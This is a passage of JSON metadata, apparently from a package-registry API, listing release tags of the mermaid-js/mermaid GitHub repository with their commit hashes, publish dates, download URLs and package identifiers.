ncy_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10/manifests"},{"name":"8.13.9","sha":"77f2a57155cfd9375eb0f633d365b6bd75c31158","kind":"commit","published_at":"2022-01-16T14:28:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9/manifests"},{"name":"8.13.8","sha":"65592e0541790968703f16bc0b91a641b5443111","kind":"commit","published_at":"2021-12-28T16:31:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8/manifests"},{"name":"8.13.7","sha":"52af0476c14be9f98d669e336a5625f5fb609aee","kind":"commit","published_at":"2021-12-22T20:20:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7/manifests"},{"name":"8.13.6","sha":"a44714c715e49ff2dc86a401962dc5929b6eca06","kind":"commit","published_at":"2021-12-16T19:06:50.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6/manifests"},{"name":"real-8.13.5","sha":"7da80812e0510ae04f9ebf3a151a048ef9ce6834","kind":"commit","published_at":"2021-12-08T06:53:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/real-8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/real-8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@real-8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5/manifests"},{"name":"8.13.5","sha":"2ce18ec2a8c6f6c2ece20f749628443ac663119f","kind":"commit","published_at":"2021-12-07T22:09:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5/manifests"},{"name":"8.13.4","sha":"650bcef3d1f940aec0cf4b81d1433b74b5e0f55c","kind":"commit","published_at":"2021-11-18T16:11:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4/manifests"},{"name":"8.13.3","sha":"0d7d5ddc5fbd8482dd7e907d3eef41cd1240f68f","kind":"commit","published_at":"2021-10-14T19:19:28.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3/manifests"},{"name":"8.13.2","sha":"2758d6477803dd9e5e8975b0d93b33c69be7b377","kind":"commit","published_at":"2021-09-29T18:22:45.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2/manifests"},{"name":"8.13.1","sha":"029042393c795b4b3ef9c91ae66564610e4b0c89","kind":"commit","published_at":"2021-09-29T18:05:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1/manifests"},{"name":"8.13.0","sha":"75b79e1b23f288e4706f21f62925c17c676cf4c0","kind":"commit","published_at":"2021-09-29T06:45:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0/manifests"},{"name":"8.12.1","sha":"48b6a32fe19af7e600fb0df900aa5956159e52d7","kind":"commit","published_at":"2021-08-26T17:43:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1/manifests"},{"name":"8.12.0","sha":"296a64f465021a8424cd72d495a24f4cc3c59c1e","kind":"commit","published_at":"2021-08-26T17:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0/manifests"},{"name":"8.11.5","sha":"962998810bccd537365f7de45891ebba48487cde","kind":"commit","published_at":"2021-08-15T15:41:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5/manifests"},{"name":"8.11.4","sha":"a670b678445f2894844ecbe7352f994396caa518","kind":"commit","published_at":"2021-08-05T17:58:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4/manifests"},{"name":"8.11.3","sha":"af7f5d0aaf3ede2f2efca6f24ec527c4e7065e2f","kind":"commit","published_at":"2021-08-04T17:25:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3/manifests"},{"name":"8.11.2","sha":"9245b0bb8b82c200c7c7a277cd619db6e5dd7715","kind":"commit","published_at":"2021-07-29T17:34:51.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2/manifests"},{"name":"8.11.1","sha":"33e8ee6c0e8bfd03f5d3fee51237a156c2e5a537","kind":"commit","published_at":"2021-07-28T13:54:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1/manifests"},{"name":"untagged-78173a5e15ffdf8f1e6a","sha":"52b1b23d4753a3d068e19052e5f4d25e88057517","kind":"commit","published_at":"2021-07-15T12:54:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-78173a5e15ffdf8f1e6a","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-78173a5e15ffdf8f1e6a","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-78173a5e15ffdf8f1e6a","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a/manifests"},{"name":"8.11.0-rc2","sha":"1d782678715699e8485480bff309adc2b648c7c1","kind":"commit","published_at":"2021-06-27T05:57:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0-rc2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2/manifests"},{"name":"8.11.0","sha":"eef4ef54a177c96b0efcf1c8c98f8d4d9f454e00","kind":"commit","published_at":"2021-06-25T10:27:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0/manifests"},{"name":"untagged-f83ec2a9deaf6677e0c7","sha":"e6e94ad57ea06ef8627bf91ddfbd88f5082952bf","kind":"commit","published_at":"2021-06-05T10:11:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f83ec2a9deaf6677e0c7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f83ec2a9deaf6677e0c7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f83ec2a9deaf6677e0c7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7/manifests"},{"name":"8.10.1","sha":"417428aceada045eabcc92826c68e08a1329c98f","kind":"commit","published_at":"2021-05-10T16:14:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1/manifests"},{"name":"8.9.3","sha":"8b3ac57ce7e6ae6ea4a66a9d8a28d8fcde936bb9","kind":"commit","published_at":"2021-04-25T11:24:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3/manifests"},{"name":"untagged-502e9410f3e7fd2ed484","sha":"45918da48ec99a706aa2b39598ae32cdccf95004","kind":"commit","published_at":"2021-04-25T10:27:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-502e9410f3e7fd2ed484","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-502e9410f3e7fd2ed484","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-502e9410f3e7fd2ed484","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484/manifests"},{"name":"8.9.2","sha":"a5cc75c1f7b722ebd0c2f848b25e2350655841dd","kind":"commit","published_at":"2021-03-18T20:02:49.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2/manifests"},{"name":"8.9.1","sha":"be95b93a2d91d62bc8618b906356514232b4343d","kind":"commit","published_at":"2021-02-18T20:41:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1/manifests"},{"name":"8.9.0","sha":"3c5da00230a586843364ff55f909fe27be2c0b41","kind":"tag","published_at":"2021-01-21T18:49:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0/manifests"},{"name":"v8.8.4","sha":"d6b2bcf0d23af89f65de659d2d7edd32a41ccddc","kind":"tag","published_at":"2020-12-05T13:43:29.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v8.8.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v8.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v8.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4/manifests"},{"name":"8.8.3","sha":"e3cf8b78437bb542029e91a022c81fbd4d361e6a","kind":"commit","published_at":"2020-11-05T19:09:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3/manifests"},{"name":"8.8.2","sha":"0f9da18cbe9bea6021ab78553902e5a1a517d61a","kind":"commit","published_at":"2020-10-08T17:48:33.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2/manifests"},{"name":"8.8.1","sha":"4dc805d25add19ae07ac9fe8951b4036332e0530","kind":"commit","published_at":"2020-09-30T17:23:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1/manifests"},{"name":"8.8.0","sha":"0918b97e815ad77e8b8e88ebb52400937f197885","kind":"commit","published_at":"2020-09-05T07:46:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0/manifests"},{"name":"8.7.0","sha":"4c38b1a776d83a00e12dd820b1bee455c3954e3c","kind":"commit","published_at":"2020-08-09T12:03:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0/manifests"},{"name":"8.6.4","sha":"95b7e4f9adc560dfd2ec6cc2b1f43397b2641012","kind":"commit","published_at":"2020-07-26T12:09:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4/manifests"},{"name":"8.6.3","sha":"d12b197ec951fa74574b4ef9fb95a55881cdd7a9","kind":"commit","published_at":"2020-07-24T06:28:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3/manifests"},{"name":"8.6.2","sha":"f68536357415d16b239e04a98e6195227399557e","kind":"commit","published_at":"2020-07-22T17:22:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2/manifests"},{"name":"8.6.0","sha":"b4203992bf98c209a578b1139c44d107b708ca6c","kind":"commit","published_at":"2020-07-13T14:42:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0/manifests"},{"name":"8.5.2","sha":"e9e5c75decbd5f5bdcf6c9d63c8f8f553263f6e2","kind":"commit","published_at":"2020-06-07T08:39:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2/manifests"},{"name":"8.5.1","sha":"9470a4f1edc0d0d5b8398e2c41029895fa5f738a","kind":"tag","published_at":"2020-05-17T08:12:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1/manifests"},{"name":"untagged-566ebfbf21141b604025","sha":"0ac48a431a319b2ff7aaaef889ddd53f153acc6d","kind":"commit","published_at":"2020-05-13T17:32:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-566ebfbf21141b604025","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-566ebfbf21141b604025","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-566ebfbf21141b604025","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025/manifests"},{"name":"untagged-31c93788afe260d914bb","sha":"5bdffd7d20c5622540c691ba63f635b8eedabf40","kind":"commit","published_at":"2020-04-11T16:10:53.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-31c93788afe260d914bb","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-31c93788afe260d914bb","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-31c93788afe260d914bb","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb/manifests"},{"name":"8.4.8","sha":"1c07e550bb5fee590f69a1f7892e481a2cf53cff","kind":"commit","published_at":"2020-02-21T09:23:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8/manifests"},{"name":"untagged-7651dabb407ecd5631ce","sha":"98229a47b298f4124d88347edbd56357866df7ee","kind":"commit","published_at":"2020-02-16T11:46:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-7651dabb407ecd5631ce","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-7651dabb407ecd5631ce","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-7651dabb407ecd5631ce","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid